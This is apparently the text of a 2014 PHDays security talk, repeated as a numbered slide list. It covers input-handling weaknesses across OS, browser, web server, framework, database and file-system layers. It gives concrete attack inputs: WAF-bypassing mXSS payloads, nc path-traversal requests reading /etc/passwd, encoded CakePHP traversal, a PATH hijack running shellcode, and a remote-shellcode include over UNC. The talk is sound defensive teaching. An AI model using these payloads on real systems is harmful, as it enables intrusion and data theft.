Vulnerabilities in data processing
layers
Omar Ganiev
PHDays 2014
Moscow
whoami
• Beched (ahack.ru, @ahack_ru)
• Math student
• RDot.Org (CTF) team
• Penetration testing expert at IncSecurity
Intro
• Application’s behaviour is defined not only by
its code, but also by a plenty of external
factors such as environment
• We’ll try to dig into different layers of data
processing and point out the potential
dangers which are often ignored by
developers
Program? Turing machine!
Real program
• A lot of inputs
• User supplied input
• Operating system environment
• Hardware
• We‘ll talk about general situation and will pay
specific attention to web applications
Web application interaction
Browser Web server Application
Web application interaction
Browser Web server Framework
Database
Application
Request processing layers
• Hardware
• Operating system
• Browser
• Network
• Web server
• Framework
• Application
• Database
• File system
Request processing layers
• In general case:
Hardware
OS
Client
Network
Server
Data processing
• Each layer has some inputs and outputs
• Each input and output is somehow processed,
normalized, filtered, etc
• Developers often consider only the user inputs,
which are explicitly defined in the code
• Other problem is that often output contains
sensitive information which is used as an input
for some functions
Input/output trust
• Which input can be trusted, and which one is
user-controlled?
• Which input is secret, and which one is
contained in output?
• This is not always clear
• Let’s observe each abstract layer and look at
input and output processing weaknesses
Hardware layer
• Input from pseudo devices /dev/random ,
/dev/urandom in Linux is not always safe, see
http://www.blackhat.com/presentations/bh-
usa-06/BH-US-06-Gutterman.pdf
• Speed of system clock quartz crystals depends
on the temperature. This creates a side channel
(clock skew) for attacking anonymity systems:
http://www.cl.cam.ac.uk/~sjm217/papers/ccs0
6hotornot.pdf
• Cryptanalysis via various physical side channels
Operating system layer
• int main() { system(“id”); }
• Safe? No! There’re no inputs in application,
but there’re inputs in environment
• PATH=.:$PATH
• Put shellcode in ./id and run the executable
• Real-world example: CVE-2013-1662, unsafe
popen of lsb_release file in suid vmware-
mount binary
Operating system layer
• External libraries provide another input point
• This results in such attacks as DLL injection
and hooking
• CreateRemoteThread, SetWindowsHookEx,
etc in Windows
• LD_PRELOAD in Linux
Browser layer
• Browser makes a lot of transformations of the
data
• The purpose of transformation is standard
compliance (like RFC, W3C)
• The transformations are often done after
input validation by web application
• Breaking standards leads to various client-side
attacks
Browser layer
• XSS, UI redressing, URL spoofing, HTTP
response splitting, open redirects via the
single HTTP parameter – Request-path:
https://rdot.org/forum/showthread.php?t=25
96 (by @black2fan)
• Browsers incorrectly treat Location response
header and inject malicious data into Request-
path
Browser layer
• Mutated XSS (mXSS) is an attack on the output
• Browsers compile non-valid HTML pages into some
canonical form
• The transformations can be quite weird:
https://cure53.de/fp170.pdf
• More examples:
<listing>&lt;img src=1 onerror=alert(1)&gt;</listing>
<img src= alt=“ onerror=alert(1);//”>
• Try at http://html5sec.org/innerhtml/
Browser layer
• All the checks and input validation are typically done
on the server side
• Hence, mXSS can bypass such checks and WAF
• Consider signature-based filter (for example, in CMS
Bitrix)
• We can encode bad words in the following mXSS
payload for IE:
<listing>&lt;img src=1
o&#x6e;error=alert(1)&gt;</listing>
• This is rendered into <img src=1 onerror=alert(1)>
and bypasses WAF
Network layer
• TCP timestamps can reveal various
information (see Hardware layer)
• Network administrators often forget about
internal recursive DNS servers, which makes it
possible to transfer data in DNS tunnel,
bypassing firewalls
Web server layer
• HTTP daemon should verify validity of the
packets
• Fields should meet RFC rules
• But can one assume that this is the case and
trust any HTTP header field?
• No! Apache is a typical example of the
software, which breaks the rules
Web server layer
• Let’s discover Apache magic
$ echo a | nc localhost 80
• 400 error? Nope, the index page is loaded. Note this:
["SERVER_PROTOCOL"]=>
string(8) "HTTP/0.9"
["REQUEST_METHOD"]=>
string(1) "a"
["QUERY_STRING"]=>
string(0) ""
["REQUEST_URI"]=>
string(0) ""
Web server layer
• Often $_SERVER[‘REQUEST_URI’] is used in file inclusion,
can we perform a path traversal (not in QUERY_STRING)?
Example:
<?
$docroot = $_SERVER['DOCUMENT_ROOT'];
$url = explode('?', $_SERVER['REQUEST_URI']);
$path = substr($url[0], 1);
$parts = explode('/', $path);
if($parts[0] == 'assets') {
readfile("$docroot/$path");
exit();
}
Web server layer
• Okay, let’s try:
$ echo 'GET /../../../../../etc/passwd' | nc
localhost 80
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML
2.0//EN">
<html><head>
<title>400 Bad Request</title>
Web server layer
• Here comes double-slash magic:
$ echo -e 'GET xassets/../../..//etc/passwd' | nc
localhost 80
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
…
• Clearly, this should not work, but it works. You
should not trust the web server data
processing!
Web server layer
• Similar constructions are often used in MVC projects
to parse the controller and action values. Example
from the article in Xakep magazine (167):
$piecesOfUrl = explode('/',
$_SERVER['REQUEST_URI']);
…
$controllerName = $piecesOfUrl[1];
…
include $fileWithControllerPath;
Web server layer
• Looks like secure, but what if someone
launches this on the Windows box with
Apache?
• The following payload will then include
myfile.php:
GET a/................myfile/..//
• There’re lots of such code snippets on GitHub
(vulnerable to file inclusion via REQUEST_URI,
not necessarily under Windows)
Web server layer
• The Host header is also untrustworthy, since
the usage of $_SERVER[‘HTTP_HOST’] can lead
to logical vulnerabilities
• For instance, spoofing of the password restore
link
• See
http://www.skeletonscribe.net/2013/05/pract
ical-http-host-header-attacks.html
Web server layer
• This was all about input. What about output?
• Web servers reveal current server time (Date
header), static files’ modification time (Last-
Modified header)
• This can be used to predict the PRNG seed in
PHP (using also PHPSESSID cookie value):
http://habrahabr.ru/company/pt/blog/149746/
Web server layer
• Also consider the following code:
function genid() {
mt_srand(time());
$h = fopen('entropy', 'r');
$fstat = fstat($h);
fclose($h);
return md5(mt_rand() . $fstat[ 'atime' ] . $fstat[ 'mtime' ]);
}
• An id generated by such a function is insecure: an attacker
can obtain mtime from Last-Modified header and atime --
by accessing ‘entropy’ file and reading Date header
Framework layer
• Do not always trust frameworks! Not every
method is secure, read the source code and
documentation
• Insecure Ruby on Rails methods: http://rails-
sqli.org/
• Rather popular Yii class with a lot of find*()
methods without SQL injection protection:
https://github.com/yiisoft/yii/blob/master/fra
mework/db/ar/CActiveRecord.php
Framework layer
• Example of insecure data processing inside the
framework CakePHP:
http://www.securityfocus.com/archive/1/527974
/30/0/threaded
• The data (PATH_INFO variable) is first validated
and then decoded, thus it’s possible to bypass the
check:
/theme/Test1/%2e.//%2e.//%2e.//%2e.//%2e.//
%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%
2e./etc/passwd
Database layer
• DBMS store data in the fields with particular
format (VARCHAR, BLOB, TEXT, INT, etc)
• Each format has its own limitations, thus, an input
data is transformed – trimmed or truncated
• SQL column truncation attack can lead to
compromise of any user account in the system:
INSERT INTO `users` VALUES (‘admin x’,
‘password’);
Database layer
• PHP function addslashes can be bypassed:
http://shiflett.org/blog/2006/jan/addslashes-
versus-mysql-real-escape-string
• This is due to charset transformations, when
MySQL connection uses multi-byte charsets
like BIG5 or GBK
File system layer
• In PHP there’re a lot of weird file path
normalization algorithms
• FindFirstFile WinAPI method allows to pass
wildcards instead of exact paths to include
functions under Windows:
https://rdot.org/forum/showthread.php?t=926
• For example, this will include C:boot.ini:
include 'C:<oot"<<';
File system layer
• In old version of PHP:
/etc/passwd///[x4096]///.php = /etc/passwd ;
/etc/passwd///// = /etc/passwd
• Open_basedir bypass via glob wrapper:
http://ahack.ru/bugs/php-vulnerabilities-
exploits.htm
• The path glob://… is first considered as
relative and then is converted into URL
File system layer
• Allow_url_include and allow_url_fopen
bypass via UNC path:
include '//IP/path/shellcode.txt';
• Security checks are performed before
transformation into remote UNC path
Outro
• Interaction with program goes through
different layers, and each layer has its own
parameters and data processing rules
• The rule: first formatting, then validation
• Each variable, which is not explicitly set in the
code, should be treated as a potential source
of malicious data
Thanks for attention!
Questions?
admin@ahack.ru
beched@incsecurity.ru

Vulnerabilities in data processing levels

  • 1.
    Vulnerabilities in dataprocessing layers Omar Ganiev PHDays 2014 Moscow
  • 2.
    whoami • Beched (ahack.ru,@ahack_ru) • Math student • RDot.Org (CTF) team • Penetration testing expert at IncSecurity
  • 3.
    Intro • Application’s behaviouris defined not only by its code, but also by a plenty of external factors such as environment • We’ll try to dig into different layers of data processing and point out the potential dangers which are often ignored by developers
  • 4.
  • 5.
    Real program • Alot of inputs • User supplied input • Operating system environment • Hardware • We‘ll talk about general situation and will pay specific attention to web applications
  • 6.
  • 7.
    Web application interaction BrowserWeb server Framework Database Application
  • 8.
    Request processing layers •Hardware • Operating system • Browser • Network • Web server • Framework • Application • Database • File system
  • 9.
    Request processing layers •In general case: Hardware OS Client Network Server
  • 10.
    Data processing • Eachlayer has some inputs and outputs • Each input and output is somehow processed, normalized, filtered, etc • Developers often consider only the user inputs, which are explicitly defined in the code • Other problem is that often output contains sensitive information which is used as an input for some functions
  • 11.
    Input/output trust • Whichinput can be trusted, and which one is user-controlled? • Which input is secret, and which one is contained in output? • This is not always clear • Let’s observe each abstract layer and look at input and output processing weaknesses
  • 12.
    Hardware layer • Inputfrom pseudo devices /dev/random , /dev/urandom in Linux is not always safe, see http://www.blackhat.com/presentations/bh- usa-06/BH-US-06-Gutterman.pdf • Speed of system clock quartz crystals depends on the temperature. This creates a side channel (clock skew) for attacking anonymity systems: http://www.cl.cam.ac.uk/~sjm217/papers/ccs0 6hotornot.pdf • Cryptanalysis via various physical side channels
  • 13.
    Operating system layer •int main() { system(“id”); } • Safe? No! There’re no inputs in application, but there’re inputs in environment • PATH=.:$PATH • Put shellcode in ./id and run the executable • Real-world example: CVE-2013-1662, unsafe popen of lsb_release file in suid vmware- mount binary
  • 14.
    Operating system layer •External libraries provide another input point • This results in such attacks as DLL injection and hooking • CreateRemoteThread, SetWindowsHookEx, etc in Windows • LD_PRELOAD in Linux
  • 15.
    Browser layer • Browsermakes a lot of transformations of the data • The purpose of transformation is standard compliance (like RFC, W3C) • The transformations are often done after input validation by web application • Breaking standards leads to various client-side attacks
  • 16.
    Browser layer • XSS,UI redressing, URL spoofing, HTTP response splitting, open redirects via the single HTTP parameter – Request-path: https://rdot.org/forum/showthread.php?t=25 96 (by @black2fan) • Browsers incorrectly treat Location response header and inject malicious data into Request- path
  • 17.
    Browser layer • MutatedXSS (mXSS) is an attack on the output • Browsers compile non-valid HTML pages into some canonical form • The transformations can be quite weird: https://cure53.de/fp170.pdf • More examples: <listing>&lt;img src=1 onerror=alert(1)&gt;</listing> <img src= alt=“ onerror=alert(1);//”> • Try at http://html5sec.org/innerhtml/
  • 18.
    Browser layer • Allthe checks and input validation are typically done on the server side • Hence, mXSS can bypass such checks and WAF • Consider signature-based filter (for example, in CMS Bitrix) • We can encode bad words in the following mXSS payload for IE: <listing>&lt;img src=1 o&#x6e;error=alert(1)&gt;</listing> • This is rendered into <img src=1 onerror=alert(1)> and bypasses WAF
  • 19.
    Network layer • TCPtimestamps can reveal various information (see Hardware layer) • Network administrators often forget about internal recursive DNS servers, which makes it possible to transfer data in DNS tunnel, bypassing firewalls
  • 20.
    Web server layer •HTTP daemon should verify validity of the packets • Fields should meet RFC rules • But can one assume that this is the case and trust any HTTP header field? • No! Apache is a typical example of the software, which breaks the rules
  • 21.
    Web server layer •Let’s discover Apache magic $ echo a | nc localhost 80 • 400 error? Nope, the index page is loaded. Note this: ["SERVER_PROTOCOL"]=> string(8) "HTTP/0.9" ["REQUEST_METHOD"]=> string(1) "a" ["QUERY_STRING"]=> string(0) "" ["REQUEST_URI"]=> string(0) ""
  • 22.
    Web server layer •Often $_SERVER[‘REQUEST_URI’] is used in file inclusion, can we perform a path traversal (not in QUERY_STRING)? Example: <? $docroot = $_SERVER['DOCUMENT_ROOT']; $url = explode('?', $_SERVER['REQUEST_URI']); $path = substr($url[0], 1); $parts = explode('/', $path); if($parts[0] == 'assets') { readfile("$docroot/$path"); exit(); }
  • 23.
    Web server layer •Okay, let’s try: $ echo 'GET /../../../../../etc/passwd' | nc localhost 80 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>400 Bad Request</title>
  • 24.
    Web server layer •Here comes double-slash magic: $ echo -e 'GET xassets/../../..//etc/passwd' | nc localhost 80 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh … • Clearly, this should not work, but it works. You should not trust the web server data processing!
  • 25.
    Web server layer •Similar constructions are often used in MVC projects to parse the controller and action values. Example from the article in Xakep magazine (167): $piecesOfUrl = explode('/', $_SERVER['REQUEST_URI']); … $controllerName = $piecesOfUrl[1]; … include $fileWithControllerPath;
  • 26.
    Web server layer •Looks like secure, but what if someone launches this on the Windows box with Apache? • The following payload will then include myfile.php: GET a/................myfile/..// • There’re lots of such code snippets on GitHub (vulnerable to file inclusion via REQUEST_URI, not necessarily under Windows)
  • 27.
    Web server layer •The Host header is also untrustworthy, since the usage of $_SERVER[‘HTTP_HOST’] can lead to logical vulnerabilities • For instance, spoofing of the password restore link • See http://www.skeletonscribe.net/2013/05/pract ical-http-host-header-attacks.html
  • 28.
    Web server layer •This was all about input. What about output? • Web servers reveal current server time (Date header), static files’ modification time (Last- Modified header) • This can be used to predict the PRNG seed in PHP (using also PHPSESSID cookie value): http://habrahabr.ru/company/pt/blog/149746/
  • 29.
    Web server layer •Also consider the following code: function genid() { mt_srand(time()); $h = fopen('entropy', 'r'); $fstat = fstat($h); fclose($h); return md5(mt_rand() . $fstat[ 'atime' ] . $fstat[ 'mtime' ]); } • An id generated by such a function is insecure: an attacker can obtain mtime from Last-Modified header and atime -- by accessing ‘entropy’ file and reading Date header
  • 30.
    Framework layer • Donot always trust frameworks! Not every method is secure, read the source code and documentation • Insecure Ruby on Rails methods: http://rails- sqli.org/ • Rather popular Yii class with a lot of find*() methods without SQL injection protection: https://github.com/yiisoft/yii/blob/master/fra mework/db/ar/CActiveRecord.php
  • 31.
    Framework layer • Exampleof insecure data processing inside the framework CakePHP: http://www.securityfocus.com/archive/1/527974 /30/0/threaded • The data (PATH_INFO variable) is first validated and then decoded, thus it’s possible to bypass the check: /theme/Test1/%2e.//%2e.//%2e.//%2e.//%2e.// %2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//% 2e./etc/passwd
  • 32.
    Database layer • DBMSstore data in the fields with particular format (VARCHAR, BLOB, TEXT, INT, etc) • Each format has its own limitations, thus, an input data is transformed – trimmed or truncated • SQL column truncation attack can lead to compromise of any user account in the system: INSERT INTO `users` VALUES (‘admin x’, ‘password’);
  • 33.
    Database layer • PHPfunction addslashes can be bypassed: http://shiflett.org/blog/2006/jan/addslashes- versus-mysql-real-escape-string • This is due to charset transformations, when MySQL connection uses multi-byte charsets like BIG5 or GBK
  • 34.
    File system layer •In PHP there’re a lot of weird file path normalization algorithms • FindFirstFile WinAPI method allows to pass wildcards instead of exact paths to include functions under Windows: https://rdot.org/forum/showthread.php?t=926 • For example, this will include C:boot.ini: include 'C:<oot"<<';
  • 35.
    File system layer •In old version of PHP: /etc/passwd///[x4096]///.php = /etc/passwd ; /etc/passwd///// = /etc/passwd • Open_basedir bypass via glob wrapper: http://ahack.ru/bugs/php-vulnerabilities- exploits.htm • The path glob://… is first considered as relative and then is converted into URL
  • 36.
    File system layer •Allow_url_include and allow_url_fopen bypass via UNC path: include '//IP/path/shellcode.txt'; • Security checks are performed before transformation into remote UNC path
  • 37.
    Outro • Interaction withprogram goes through different layers, and each layer has its own parameters and data processing rules • The rule: first formatting, then validation • Each variable, which is not explicitly set in the code, should be treated as a potential source of malicious data
  • 38.